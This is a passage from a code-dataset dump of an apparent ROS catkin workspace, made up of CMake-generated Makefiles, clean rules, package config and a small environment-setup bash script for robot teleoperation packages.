beginner_tutorials/CMakeFiles/beginner_tutorials_gencpp.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_gencpp.dir/build\n.PHONY : beginner_tutorials_gencpp/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_generate_messages\n\n# Build rule for target.\nbeginner_tutorials_generate_messages: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_generate_messages\n.PHONY : beginner_tutorials_generate_messages\n\n# fast build rule for target.\nbeginner_tutorials_generate_messages/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages.dir/build\n.PHONY : beginner_tutorials_generate_messages/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_generate_messages_cpp\n\n# Build rule for target.\nbeginner_tutorials_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_generate_messages_cpp\n.PHONY : beginner_tutorials_generate_messages_cpp\n\n# fast build rule for target.\nbeginner_tutorials_generate_messages_cpp/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_cpp.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_cpp.dir/build\n.PHONY : beginner_tutorials_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_generate_messages_eus\n\n# Build rule for target.\nbeginner_tutorials_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_generate_messages_eus\n.PHONY : beginner_tutorials_generate_messages_eus\n\n# fast build rule for target.\nbeginner_tutorials_generate_messages_eus/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_eus.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_eus.dir/build\n.PHONY : beginner_tutorials_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_generate_messages_lisp\n\n# Build rule for target.\nbeginner_tutorials_generate_messages_lisp: 
cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_generate_messages_lisp\n.PHONY : beginner_tutorials_generate_messages_lisp\n\n# fast build rule for target.\nbeginner_tutorials_generate_messages_lisp/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_lisp.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_lisp.dir/build\n.PHONY : beginner_tutorials_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_generate_messages_py\n\n# Build rule for target.\nbeginner_tutorials_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_generate_messages_py\n.PHONY : beginner_tutorials_generate_messages_py\n\n# fast build rule for target.\nbeginner_tutorials_generate_messages_py/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_py.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_generate_messages_py.dir/build\n.PHONY : beginner_tutorials_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_geneus\n\n# Build rule for target.\nbeginner_tutorials_geneus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_geneus\n.PHONY : beginner_tutorials_geneus\n\n# fast build rule for target.\nbeginner_tutorials_geneus/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_geneus.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_geneus.dir/build\n.PHONY : beginner_tutorials_geneus/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_genlisp\n\n# Build rule for target.\nbeginner_tutorials_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_genlisp\n.PHONY : beginner_tutorials_genlisp\n\n# fast build rule for target.\nbeginner_tutorials_genlisp/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_genlisp.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_genlisp.dir/build\n.PHONY : beginner_tutorials_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_genpy\n\n# Build rule for target.\nbeginner_tutorials_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_genpy\n.PHONY : beginner_tutorials_genpy\n\n# fast build rule for target.\nbeginner_tutorials_genpy/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/beginner_tutorials_genpy.dir/build.make beginner_tutorials/CMakeFiles/beginner_tutorials_genpy.dir/build\n.PHONY : beginner_tutorials_genpy/fast\n\n#=============================================================================\n# Target rules for targets named _file_server_generate_messages_check_deps_GetBinaryFile\n\n# Build rule for target.\n_file_server_generate_messages_check_deps_GetBinaryFile: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _file_server_generate_messages_check_deps_GetBinaryFile\n.PHONY : _file_server_generate_messages_check_deps_GetBinaryFile\n\n# fast build rule for target.\n_file_server_generate_messages_check_deps_GetBinaryFile/fast:\n\t$(MAKE) -f file_server/CMakeFiles/_file_server_generate_messages_check_deps_GetBinaryFile.dir/build.make 
file_server/CMakeFiles/_file_server_generate_messages_check_deps_GetBinaryFile.dir/build\n.PHONY : _file_server_generate_messages_check_deps_GetBinaryFile/fast\n\n#=============================================================================\n# Target rules for targets named file_server\n\n# Build rule for target.\nfile_server: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server\n.PHONY : file_server\n\n# fast build rule for target.\nfile_server/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server.dir/build.make file_server/CMakeFiles/file_server.dir/build\n.PHONY : file_server/fast\n\n#=============================================================================\n# Target rules for targets named file_server_gencpp\n\n# Build rule for target.\nfile_server_gencpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_gencpp\n.PHONY : file_server_gencpp\n\n# fast build rule for target.\nfile_server_gencpp/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_gencpp.dir/build.make file_server/CMakeFiles/file_server_gencpp.dir/build\n.PHONY : file_server_gencpp/fast\n\n#=============================================================================\n# Target rules for targets named file_server_generate_messages\n\n# Build rule for target.\nfile_server_generate_messages: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_generate_messages\n.PHONY : file_server_generate_messages\n\n# fast build rule for target.\nfile_server_generate_messages/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_generate_messages.dir/build.make file_server/CMakeFiles/file_server_generate_messages.dir/build\n.PHONY : file_server_generate_messages/fast\n\n#=============================================================================\n# Target rules for targets named file_server_generate_messages_cpp\n\n# Build rule for target.\nfile_server_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_generate_messages_cpp\n.PHONY : file_server_generate_messages_cpp\n\n# fast build rule for target.\nfile_server_generate_messages_cpp/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_generate_messages_cpp.dir/build.make file_server/CMakeFiles/file_server_generate_messages_cpp.dir/build\n.PHONY : file_server_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named file_server_generate_messages_eus\n\n# Build rule for target.\nfile_server_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_generate_messages_eus\n.PHONY : file_server_generate_messages_eus\n\n# fast build rule for target.\nfile_server_generate_messages_eus/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_generate_messages_eus.dir/build.make file_server/CMakeFiles/file_server_generate_messages_eus.dir/build\n.PHONY : file_server_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named file_server_generate_messages_lisp\n\n# Build rule for target.\nfile_server_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_generate_messages_lisp\n.PHONY : file_server_generate_messages_lisp\n\n# fast build rule for target.\nfile_server_generate_messages_lisp/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_generate_messages_lisp.dir/build.make 
file_server/CMakeFiles/file_server_generate_messages_lisp.dir/build\n.PHONY : file_server_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named file_server_generate_messages_py\n\n# Build rule for target.\nfile_server_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_generate_messages_py\n.PHONY : file_server_generate_messages_py\n\n# fast build rule for target.\nfile_server_generate_messages_py/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_generate_messages_py.dir/build.make file_server/CMakeFiles/file_server_generate_messages_py.dir/build\n.PHONY : file_server_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named file_server_geneus\n\n# Build rule for target.\nfile_server_geneus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_geneus\n.PHONY : file_server_geneus\n\n# fast build rule for target.\nfile_server_geneus/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_geneus.dir/build.make file_server/CMakeFiles/file_server_geneus.dir/build\n.PHONY : file_server_geneus/fast\n\n#=============================================================================\n# Target rules for targets named file_server_genlisp\n\n# Build rule for target.\nfile_server_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_genlisp\n.PHONY : file_server_genlisp\n\n# fast build rule for target.\nfile_server_genlisp/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_genlisp.dir/build.make file_server/CMakeFiles/file_server_genlisp.dir/build\n.PHONY : file_server_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named file_server_genpy\n\n# Build rule for target.\nfile_server_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 file_server_genpy\n.PHONY : file_server_genpy\n\n# fast build rule for target.\nfile_server_genpy/fast:\n\t$(MAKE) -f file_server/CMakeFiles/file_server_genpy.dir/build.make file_server/CMakeFiles/file_server_genpy.dir/build\n.PHONY : file_server_genpy/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... clean_test_results\"\n\t@echo \"... download_extra_data\"\n\t@echo \"... doxygen\"\n\t@echo \"... edit_cache\"\n\t@echo \"... install\"\n\t@echo \"... install/local\"\n\t@echo \"... install/strip\"\n\t@echo \"... list_install_components\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... run_tests\"\n\t@echo \"... test\"\n\t@echo \"... tests\"\n\t@echo \"... gtest\"\n\t@echo \"... gtest_main\"\n\t@echo \"... _basic_teleop_generate_messages_check_deps_Move\"\n\t@echo \"... basic_teleop_gencpp\"\n\t@echo \"... basic_teleop_generate_messages\"\n\t@echo \"... basic_teleop_generate_messages_cpp\"\n\t@echo \"... basic_teleop_generate_messages_eus\"\n\t@echo \"... basic_teleop_generate_messages_lisp\"\n\t@echo \"... basic_teleop_generate_messages_py\"\n\t@echo \"... basic_teleop_geneus\"\n\t@echo \"... basic_teleop_genlisp\"\n\t@echo \"... basic_teleop_genpy\"\n\t@echo \"... depth_stream_stabilizer\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... 
geometry_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... predictive_director\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... sensor_msgs_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_eus\"\n\t@echo \"... sensor_msgs_generate_messages_lisp\"\n\t@echo \"... sensor_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... _beginner_tutorials_generate_messages_check_deps_AddTwoInts\"\n\t@echo \"... _beginner_tutorials_generate_messages_check_deps_Num\"\n\t@echo \"... beginner_tutorials_gencpp\"\n\t@echo \"... beginner_tutorials_generate_messages\"\n\t@echo \"... beginner_tutorials_generate_messages_cpp\"\n\t@echo \"... beginner_tutorials_generate_messages_eus\"\n\t@echo \"... beginner_tutorials_generate_messages_lisp\"\n\t@echo \"... beginner_tutorials_generate_messages_py\"\n\t@echo \"... beginner_tutorials_geneus\"\n\t@echo \"... beginner_tutorials_genlisp\"\n\t@echo \"... beginner_tutorials_genpy\"\n\t@echo \"... _file_server_generate_messages_check_deps_GetBinaryFile\"\n\t@echo \"... file_server\"\n\t@echo \"... file_server_gencpp\"\n\t@echo \"... file_server_generate_messages\"\n\t@echo \"... file_server_generate_messages_cpp\"\n\t@echo \"... file_server_generate_messages_eus\"\n\t@echo \"... file_server_generate_messages_lisp\"\n\t@echo \"... file_server_generate_messages_py\"\n\t@echo \"... file_server_geneus\"\n\t@echo \"... file_server_genlisp\"\n\t@echo \"... file_server_genpy\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
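The catkin top-level Makefile in the record above exposes every CMake target twice: a plain name that depends on `cmake_check_build_system` (so CMake can regenerate the makefiles first), and a `<name>/fast` variant that invokes the target's `build.make` directly and skips that check. A minimal usage sketch, assuming the build tree from the record lives at ~/catkin_ws/build (the path is taken from the Makefile's CMAKE_BINARY_DIR, not stated elsewhere):

# Hedged sketch -- run from the workspace's build directory.
cd ~/catkin_ws/build

# Plain target: re-runs cmake_check_build_system first, so edits to any
# CMakeLists.txt are picked up before the target builds.
make file_server_generate_messages_py

# /fast variant: jumps straight to the target's build.make; quicker, but
# it will happily use stale makefiles if the CMake files changed.
make file_server_generate_messages_py/fast

# The help rule echoes the same target names listed in the record.
make help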
{
"alpha_fraction": 0.7909738421440125,
"alphanum_fraction": 0.7909738421440125,
"avg_line_length": 41.099998474121094,
"blob_id": "462135b619c152320269fb99458817a9c27e926f",
"content_id": "f2504d146933e2295e72bc5a252beb12bde492b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/depth_stream_stabilizer.dir/src/depth_stream_stabilizer.cpp.o\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/depth_stream_stabilizer.pdb\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/depth_stream_stabilizer\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang CXX)\n INCLUDE(CMakeFiles/depth_stream_stabilizer.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7560975551605225,
"alphanum_fraction": 0.7560975551605225,
"avg_line_length": 40,
"blob_id": "65a0266f02394651837d137ab1ee581fff5213d5",
"content_id": "338c274a4b8111b31bc24d5392394e18783cc62f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 2,
"path": "/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-extras.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "set(basic_teleop_MESSAGE_FILES \"msg/Move.msg\")\nset(basic_teleop_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7718446850776672,
"alphanum_fraction": 0.7718446850776672,
"avg_line_length": 50.5,
"blob_id": "da1289e7dcba6171fddd6d4e23e0058a4c3bbb2c",
"content_id": "a62e30ea964c3cbe54272ed60de9b1944f2d0814",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 4,
"path": "/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-paths.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${basic_teleop_DIR}/..\" \"msg\" basic_teleop_MSG_INCLUDE_DIRS UNIQUE)\nset(basic_teleop_MSG_DEPENDENCIES std_msgs;sensor_msgs)\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.6907894611358643,
"avg_line_length": 15.88888931274414,
"blob_id": "b1aee2cc839e599431525fd1a3c5864483d5c9bf",
"content_id": "c2b9ca52a480540cc0d98ed7f7625ec0db7c6e98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 9,
"path": "/src/basic_teleop/misc/will_ros_setup.bash",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/bin/bash \ncd ~/catkin_ws\ncatkin_make\ncd devel\n. setup.bash\nexport ROS_MASTER_URI=http://192.168.0.101:11311/\nexport ROS_IP=192.168.0.101\ncd ..\ncd ..\n"
},
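The will_ros_setup.bash record above rebuilds the workspace with catkin_make, sources devel/setup.bash, and pins ROS_MASTER_URI and ROS_IP to 192.168.0.101. Because those exports (and the sourced setup.bash) must land in the interactive shell, the script only has its intended effect when sourced rather than executed; run as ./will_ros_setup.bash, the environment changes die with the subshell. A short sketch, assuming the workspace checkout sits at ~/catkin_ws as the script itself does:

# Source the script so its exports persist in the current shell.
source ~/catkin_ws/src/basic_teleop/misc/will_ros_setup.bash

# Sanity-check that the master URI and IP took effect.
echo "$ROS_MASTER_URI"   # expected: http://192.168.0.101:11311/
echo "$ROS_IP"           # expected: 192.168.0.101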
{
"alpha_fraction": 0.7525641322135925,
"alphanum_fraction": 0.7576923370361328,
"avg_line_length": 59.07692337036133,
"blob_id": "2877047b31ed6db612cd1e1f649b2dde4e3764bc",
"content_id": "898963cd35cd9d4bd8a518dcb560d6d12f3a7747",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 13,
"path": "/build/basic_teleop/catkin_generated/package.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"basic_teleop\")\nset(basic_teleop_VERSION \"0.0.0\")\nset(basic_teleop_MAINTAINER \"pi <[email protected]>\")\nset(basic_teleop_PACKAGE_FORMAT \"1\")\nset(basic_teleop_BUILD_DEPENDS \"message_generation\" \"roscpp\" \"rospy\" \"std_msgs\" \"sensor_msgs\")\nset(basic_teleop_BUILD_EXPORT_DEPENDS \"message_generation\" \"message_runtime\" \"roscpp\" \"rospy\" \"std_msgs\" \"sensor_msgs\")\nset(basic_teleop_BUILDTOOL_DEPENDS \"catkin\")\nset(basic_teleop_BUILDTOOL_EXPORT_DEPENDS )\nset(basic_teleop_EXEC_DEPENDS \"message_generation\" \"message_runtime\" \"roscpp\" \"rospy\" \"std_msgs\" \"sensor_msgs\")\nset(basic_teleop_RUN_DEPENDS \"message_generation\" \"message_runtime\" \"roscpp\" \"rospy\" \"std_msgs\" \"sensor_msgs\")\nset(basic_teleop_TEST_DEPENDS )\nset(basic_teleop_DOC_DEPENDS )\nset(basic_teleop_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.798353910446167,
"alphanum_fraction": 0.798353910446167,
"avg_line_length": 29.375,
"blob_id": "924a52b32114267a583b67e1b350062e6463037f",
"content_id": "383ce4701812b2525070cc78a684685fce3f75ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 8,
"path": "/build/file_server/CMakeFiles/file_server_generate_messages.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/file_server_generate_messages\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/file_server_generate_messages.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7641509175300598,
"alphanum_fraction": 0.7735849022865295,
"avg_line_length": 41.400001525878906,
"blob_id": "0c5dc88cbabc5a126ee9038a7b757215805d6d52",
"content_id": "e9e7368f7e2b9e6b536cf24eac26634cc2f37cc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 424,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_generate_messages_py.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_generate_messages_py\"\n \"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop/msg/_Move.py\"\n \"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop/msg/__init__.py\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/basic_teleop_generate_messages_py.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7745417356491089,
"alphanum_fraction": 0.7757928371429443,
"avg_line_length": 47.338958740234375,
"blob_id": "689bb54eee8f910ed80947b4e732768b8d9435ee",
"content_id": "3cb387aebf493de37e86fb9a625c47350b943201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 34370,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 711,
"path": "/build/basic_teleop/Makefile",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 2.8\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n.PHONY : default_target\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n# A target that is always out of date.\ncmake_force:\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/will/catkin_ws/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/will/catkin_ws/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running interactive CMake command-line interface...\"\n\t/usr/bin/cmake -i .\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n.PHONY : edit_cache/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n.PHONY : install/local/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n.PHONY : install/strip/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : 
rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n.PHONY : test/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/will/catkin_ws/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles /home/will/catkin_ws/build/basic_teleop/CMakeFiles/progress.marks\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/will/catkin_ws/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/rule\n.PHONY : basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/rule\n\n# Convenience name for target.\n_basic_teleop_generate_messages_check_deps_Move: basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/rule\n.PHONY : _basic_teleop_generate_messages_check_deps_Move\n\n# fast build rule for target.\n_basic_teleop_generate_messages_check_deps_Move/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build.make basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build\n.PHONY : _basic_teleop_generate_messages_check_deps_Move/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/basic_teleop_gencpp.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/rule\n.PHONY : basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/rule\n\n# Convenience name for target.\nbasic_teleop_gencpp: basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/rule\n.PHONY : basic_teleop_gencpp\n\n# fast build rule for target.\nbasic_teleop_gencpp/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build\n.PHONY : basic_teleop_gencpp/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/basic_teleop_generate_messages.dir/rule:\n\tcd 